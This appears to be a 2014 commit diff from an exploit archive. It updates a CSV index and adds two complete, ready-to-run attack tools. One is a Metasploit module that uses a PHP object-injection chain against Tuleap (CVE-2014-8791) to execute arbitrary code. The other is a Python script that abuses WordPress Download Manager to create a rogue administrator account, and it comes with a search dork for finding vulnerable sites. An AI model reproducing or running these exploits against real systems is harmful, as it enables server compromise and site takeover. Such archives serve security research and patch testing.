Updated 12_17_2014

files.csv

@@ -32006,9 +32006,11 @@ id,file,description,date,author,platform,type,port
 35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
+35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
 35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
-35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
+35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
 35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
+35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80

platforms/php/remote/35545.rb

@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Tuleap PHP Unserialize Code Execution',
+      'Description'    => %q{
+        This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be
+        abused to allow authenticated users to execute arbitrary code with the permissions of the
+        web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'
+        file. The exploit abuses the destructor method from the Jabbex class in order to reach a
+        call_user_func_array() call in the Jabber class and call the fetchPostActions() method from
+        the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In
+        order to work, the target must have the 'sys_create_project_in_one_step' option disabled.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 'EgiX',
+      'References'     =>
+        [
+          ['CVE', '2014-8791'],
+          ['OSVDB', '115128'],
+          ['URL', 'http://karmainsecurity.com/KIS-2014-13'],
+          ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Generic (PHP Payload)', {}]],
+      'DisclosureDate' => 'Nov 27 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
+        OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+        OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
+        OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
+        Opt::RPORT(443)
+      ], self.class)
+  end
+
+  def check
+    flag = rand_text_alpha(rand(10)+20)
+    res = exec_php("print #{flag};")
+
+    if res and res.body and res.body.to_s =~ /#{flag}/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def do_login()
+    print_status("#{peer} - Logging in...")
+
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'account/login.php'),
+      'vars_post' => {'form_loginname' => username, 'form_pw' => password}
+    })
+
+    unless res && res.code == 302
+      fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")
+    end
+
+    print_status("#{peer} - Login successful with #{username}:#{password}")
+    res.get_cookies
+  end
+
+  def exec_php(php_code)
+    session_cookies = do_login()
+
+    chain =  'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}'
+    chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";'
+    chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'
+    chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}'
+
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'project/register.php'),
+      'cookie'    => session_cookies,
+      'vars_post' => {'data' => chain},
+      'headers'   => {'payload' => Rex::Text.encode_base64(php_code)}
+    }, 3)
+  end
+
+  def exploit
+    print_status("#{peer} - Exploiting the PHP object injection...")
+    exec_php(payload.encoded)
+  end
+end

platforms/php/webapps/35533.py

@@ -0,0 +1,189 @@
+#!/usr/bin/python
+#
+# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
+#
+# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
+#
+# Exploit written by Claudio Viviani
+#
+#
+# 2014-12-03:  Discovered vulnerability
+# 2014-12-04:  Patch released (2.7.5)
+#
+# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
+#
+# --------------------------------------------------------------------
+#
+# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
+#
+# function wpdm_ajax_call_exec()
+# {
+#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
+#         if (function_exists($_POST['execute']))
+#             call_user_func($_POST['execute'], $_POST);
+#         else
+#             echo "function not defined!";
+#         die();
+#     }
+# }
+#
+# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
+# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
+#
+#         if (function_exists($_POST['execute']))
+#             call_user_func($_POST['execute'], $_POST);
+#         else
+#         ...
+#         ...
+#         ...
+#
+# $_POST data needs to be an array
+#
+#
+# The wordpress function wp_insert_user is perfect:
+#
+# http://codex.wordpress.org/Function_Reference/wp_insert_user
+#
+# Description
+#
+# Insert a user into the database.
+#
+# Usage
+#
+# <?php wp_insert_user( $userdata ); ?>
+#
+# Parameters
+#
+# $userdata
+#     (mixed) (required) An array of user data, stdClass or WP_User object.
+#        Default: None
+#
+#
+#
+# Evil POST Data (Add new Wordpress Administrator):
+#
+# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
+#
+# ---------------------------------------------------------------------
+#
+# Dork google:  index of "wordpress-download"
+#
+# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
+#
+# Http connection
+import urllib, urllib2, socket
+#
+import sys
+# String manipulator
+import string, random
+# Args management
+import optparse
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+# Check if file exists and has readable
+def checkfile(file):
+    if not os.path.isfile(file) and not os.access(file, os.R_OK):
+        print '[X] '+file+' file is missing or not readable'
+        sys.exit(1)
+    else:
+        return file
+
+def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
+    return ''.join(random.choice(chars) for _ in range(size))
+
+banner = """
+    ___ ___               __
+   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
+   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
+   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
+   |:      |    ______      |__|              __                __
+   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
+   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
+               |.  |    |_____|________|__|__|__|_____|___._|_____|
+               |:  1    /   ___ ___
+               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
+               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
+                           |. \_/  |___._|__|__|___._|___  |_____|__|
+                           |:  |   |                 |_____|
+                           |::.|:. |
+                           `--- ---'
+                                                   Wordpress Download Manager
+                                                      R3m0t3 C0d3 Ex3cut10n
+                                                         (Add WP Admin)
+                                                          v2.7.0-2.7.4
+
+                               Written by:
+
+                             Claudio Viviani
+
+                          http://www.homelab.it
+
+                             info@homelab.it
+                         homelabit@protonmail.ch
+
+                   https://www.facebook.com/homelabit
+                      https://twitter.com/homelabit
+                    https://plus.google.com/+HomelabIt1/
+           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  )
+commandList.add_option('--timeout', action="store", default=10, type="int",
+                  help="[Timeout Value] - Default 10",
+                  )
+
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+host = checkurl(options.target)
+timeout = options.timeout
+
+print(banner)
+
+socket.setdefaulttimeout(timeout)
+
+username = id_generator()
+pwd = id_generator()
+
+body = urllib.urlencode({'action' : 'wpdm_ajax_call',
+                         'execute' : 'wp_insert_user',
+                         'user_login' : username,
+                         'user_pass' : pwd,
+                         'role' : 'administrator'})
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+
+print "[+] Tryng to connect to: "+host
+try:
+    req = urllib2.Request(host+"/", body, headers)
+    response = urllib2.urlopen(req)
+    html = response.read()
+
+    if html == "":
+       print("[!] Account Added")
+       print("[!] Location: "+host+"/wp-login.php")
+       print("[!] Username: "+username)
+       print("[!] Password: "+pwd)
+    else:
+       print("[X] Exploitation Failed :(")
+
+except urllib2.HTTPError as e:
+    print("[X] "+str(e))
+except urllib2.URLError as e:
+    print("[X] Connection Error: "+str(e))
+